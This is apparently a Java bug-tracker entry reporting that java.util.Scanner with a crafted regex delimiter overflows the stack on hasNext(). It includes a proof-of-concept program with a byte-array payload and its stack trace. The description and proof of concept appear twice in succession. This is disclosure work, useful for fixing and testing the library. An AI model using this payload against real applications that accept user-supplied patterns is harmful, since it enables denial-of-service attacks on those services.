Details
-
Bug
-
Resolution: Unresolved
-
P4
-
18
-
None
Description
j.u.Scanner allows to set a regular expression string as text delimiter. A
missing recursion upper limit in regex processing causes a stack overflow to
occur when querying for the availability of a potential next token to be
delivered by the scanner.
Developers could use this API to allow users to query larger texts for
patterns, for example in a web application. However edge cases exist that
cause a StackOverflowError to be triggered, instead of detecting the recursion scenario earlier.
The following PoC illustrates the issue:
import java.util.*;
public class ScannerSOE {
public static void main(String[] a) {
String payload = new String(new
byte[]{91,92,97,92,87,45,45,45,45,45,45,45,45,45,45,120,121,122,123,49,44,51,38,38,38,99,-118,-118,69,93,-126,-36});
Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
s.useDelimiter(payload.substring(0,26)+(new String(new
byte[]{-118})).repeat(16384)+payload.substring(27));
s.hasNext();
}
}
to reproduce:
$ java ScannerSOE 2>&1 | head -4
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
missing recursion upper limit in regex processing causes a stack overflow to
occur when querying for the availability of a potential next token to be
delivered by the scanner.
Developers could use this API to allow users to query larger texts for
patterns, for example in a web application. However edge cases exist that
cause a StackOverflowError to be triggered, instead of detecting the recursion scenario earlier.
The following PoC illustrates the issue:
import java.util.*;
public class ScannerSOE {
public static void main(String[] a) {
String payload = new String(new
byte[]{91,92,97,92,87,45,45,45,45,45,45,45,45,45,45,120,121,122,123,49,44,51,38,38,38,99,-118,-118,69,93,-126,-36});
Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
s.useDelimiter(payload.substring(0,26)+(new String(new
byte[]{-118})).repeat(16384)+payload.substring(27));
s.hasNext();
}
}
to reproduce:
$ java ScannerSOE 2>&1 | head -4
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)